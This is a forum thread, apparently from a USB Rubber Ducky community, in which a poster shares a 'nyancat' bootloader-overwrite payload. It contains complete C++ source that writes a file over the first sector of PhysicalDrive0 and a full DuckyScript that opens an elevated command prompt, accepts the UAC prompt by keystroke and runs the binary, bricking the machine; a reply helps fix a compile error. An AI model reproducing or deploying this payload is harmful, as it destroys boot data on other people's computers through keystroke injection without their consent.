Jump to content

[DANGEROUS] Nyancat Bootloader Overwrite


ThoughtfulDev

Recommended Posts

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	char *pathToBin = "boot.bin";
	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			if (size > 0){
				byte *mbr = new byte[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfuly read!" << std::endl;
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overritten successfuly!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(binary);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	CloseHandle(drive);
    return 0;
}

2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired uac alt + key kombo (y for yes in english , j for german etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER

 

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier

 

boot.exe

Edited by ThoughtfulDev
Link to comment
Share on other sites

  • 5 months later...
4 hours ago, Neptunium said:

Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

This isn't really the source code's problem, but an issue with your compiler configuration. I assume you're using Visual Studio, and if you are - you need to configure your project to use the Multi-Byte Character Set (Found in the project properties under the General section, iirc). You can alternatively cast to a LPCWSTR, but that isn't a better option.

I would recommend reading about the different character types that you will encounter in Windows C++ development here.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...